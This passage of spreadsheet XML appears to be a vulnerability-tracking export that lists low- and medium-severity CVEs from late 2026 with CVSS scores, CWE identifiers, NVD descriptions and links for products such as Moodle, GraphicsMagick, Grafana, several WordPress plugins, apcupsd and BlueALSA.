      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q550" s="5" t="inlineStr"/>
      <c r="R550" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S550" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Moodle. Insufficient sanitization of username input on the password reset page allows a remote attacker to conduct a cross-site scripting (XSS) attack. By convincing an unauthenticated user to access a specially crafted password reset link, an attacker could execute arbitrary script in the victim's browser.</t>
        </is>
      </c>
      <c r="T550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102586</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103118</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="inlineStr"/>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q551" s="5" t="inlineStr"/>
      <c r="R551" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-674</t>
        </is>
      </c>
      <c r="S551" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in GraphicsMagick up to 1.3.47. Affected by this vulnerability is the function ExtractPostscript of the file coders/wpg.c of the component WPG File Handler. Performing a manipulation results in uncontrolled recursion. The attack may be initiated remotely. The patch is named 627b5b1b2fc2. It is suggested to install a patch to address this issue. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.</t>
        </is>
      </c>
      <c r="T551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103118</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103387</t>
        </is>
      </c>
      <c r="D552" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E552" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="inlineStr"/>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q552" s="5" t="inlineStr"/>
      <c r="R552" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S552" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in garycourt uri-js up to 4.4.1. This affects the function URI.parse of the file src/schemes/mailto.ts of the component Mailto Header Handler. This manipulation of the argument to causes uncaught exception. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103387</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103542</t>
        </is>
      </c>
      <c r="D553" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E553" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="inlineStr"/>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q553" s="5" t="inlineStr"/>
      <c r="R553" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S553" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in formtools.org Form Tools up to 3.1.1. Impacted is the function smart_fill of the file /global/code/actions.php of the component AJAX Endpoint. This manipulation of the argument url causes server-side request forgery. The attack can be initiated remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103542</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13719</t>
        </is>
      </c>
      <c r="D554" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E554" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F554" s="5" t="inlineStr">
        <is>
          <t>security@grafana.com</t>
        </is>
      </c>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="inlineStr"/>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q554" s="5" t="inlineStr"/>
      <c r="R554" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="S554" s="5" t="inlineStr">
        <is>
          <t>An authenticated user can list alert rules stored in folders they are not allowed to read through the alert rules API list endpoint. When the set of folders the user may read was empty, the folder restriction was dropped and every alert rule in the organization was returned. From Grafana 13.1.0, any user can trigger this with a folder filter. The exposed data is rule configuration; data source credentials are not exposed.</t>
        </is>
      </c>
      <c r="T554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13719</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88999</t>
        </is>
      </c>
      <c r="D555" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E555" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="inlineStr"/>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K555" s="5" t="inlineStr"/>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q555" s="5" t="inlineStr"/>
      <c r="R555" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S555" s="5" t="inlineStr">
        <is>
          <t>The Redux Framework plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 4.5.14 This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary media library attachments, including administrator-owned files, from the affected site. This is exploitable by Subscribers when a Custom Fonts field is registered on the user profile page via Redux_Users::set_profile(), as doing so causes the required redux_custom_fonts nonce to be rendered into the Subscriber's wp-admin/profile.php page.</t>
        </is>
      </c>
      <c r="T555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88999</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94672</t>
        </is>
      </c>
      <c r="D556" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E556" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F556" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="inlineStr"/>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q556" s="5" t="inlineStr"/>
      <c r="R556" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S556" s="5" t="inlineStr">
        <is>
          <t>Contributor Insecure Direct Object References (IDOR) in Safe SVG &lt;= 2.5.0 versions.</t>
        </is>
      </c>
      <c r="T556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94672</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97074</t>
        </is>
      </c>
      <c r="D557" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E557" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F557" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="inlineStr"/>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q557" s="5" t="inlineStr"/>
      <c r="R557" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S557" s="5" t="inlineStr">
        <is>
          <t>Subscriber Insecure Direct Object References (IDOR) in Newsletters, Email Marketing, SMS and Popups by Omnisend &lt;= 1.9.0 versions.</t>
        </is>
      </c>
      <c r="T557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97074</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97079</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="inlineStr"/>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr"/>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q558" s="5" t="inlineStr"/>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S558" s="5" t="inlineStr">
        <is>
          <t>Subscriber Insecure Direct Object References (IDOR) in Webba Booking &lt;= 6.5.0 versions.</t>
        </is>
      </c>
      <c r="T558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97079</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97267</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="inlineStr"/>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q559" s="5" t="inlineStr"/>
      <c r="R559" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S559" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Access Control in Prevent files / folders access &lt;= 2.6.7 versions.</t>
        </is>
      </c>
      <c r="T559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97267</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96825</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="inlineStr"/>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q560" s="5" t="inlineStr"/>
      <c r="R560" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S560" s="5" t="inlineStr">
        <is>
          <t>Subscriber Bypass Vulnerability in All In One WP Security &amp; Firewall &lt;= 5.4.8 versions.</t>
        </is>
      </c>
      <c r="T560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96825</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102137</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="inlineStr"/>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q561" s="5" t="inlineStr"/>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S561" s="5" t="inlineStr">
        <is>
          <t>An authenticated administrator could bypass the content validation applied to an administrative file upload and store a file containing dangerous content on the appliance. This did not by itself result in code execution, which would require a separate vulnerability to run the stored file.</t>
        </is>
      </c>
      <c r="T561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102137</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103533</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="inlineStr"/>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr">
        <is>
          <t>github, php, requests, hp</t>
        </is>
      </c>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q562" s="5" t="inlineStr"/>
      <c r="R562" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S562" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in David-Crty databasement up to 1.7.1. This impacts the function https:/github.com/David-Crty/databasement/pull/511 of the file app/Http/Requests/Api/V1/RestoreRequest.php of the component database-servers API Endpoint. The manipulation of the argument schema_name results in path traversal. The attack may be launched remotely. A high complexity level is associated with this attack. The exploitability is said to be difficult. The exploit has been made public and could be used. Upgrading to version 1.7.2 will fix this issue. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="T562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103533</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103436</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="inlineStr"/>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q563" s="5" t="inlineStr"/>
      <c r="R563" s="5" t="inlineStr">
        <is>
          <t>CWE-457</t>
        </is>
      </c>
      <c r="S563" s="5" t="inlineStr">
        <is>
          <t>apcupsd through 3.14.14 discloses uninitialized stack memory in getupsvar() in src/cgi/upsfetch.c (used by upsstats.cgi, multimon.cgi, and upsfstats.cgi. On the single-field path, when the matched STATUS line has fewer than three whitespace-separated tokens, sscanf("%*s %*s %s", answer) performs no assignment but the function returns success, and thus the caller prints the uninitialized destination buffer into the HTTP response.</t>
        </is>
      </c>
      <c r="T563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103436</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101887</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="inlineStr"/>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="S564" s="5" t="inlineStr">
        <is>
          <t>BlueALSA (bluez-alsa/bluealsad) contains a division-by-zero vulnerability in the LC3plus sink decoder (a2dp-lc3plus.c, a2dp_lc3plus_dec_thread) that allows a Bluetooth-adjacent attacker to crash the daemon by sending a crafted RTP media header with an attacker-controlled frame count field set to zero. Attackers can establish an A2DP source connection with an LC3plus session negotiated against a victim running bluealsad as an A2DP sink and transmit a non-fragmented LC3plus media header with a zero frame count to trigger a SIGFPE in the decoding thread, causing a denial of service on builds compiled with LC3plus support enabled.</t>
        </is>
      </c>
      <c r="T564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101887</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100270</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="inlineStr"/>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q565" s="5" t="inlineStr"/>
      <c r="R565" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S565" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 low-level Admin Read permission users could disclose integration credentials via import configurations</t>
        </is>
      </c>
      <c r="T565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100270</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102138</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="inlineStr"/>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q566" s="5" t="inlineStr"/>
      <c r="R566" s="5" t="inlineStr">
        <is>
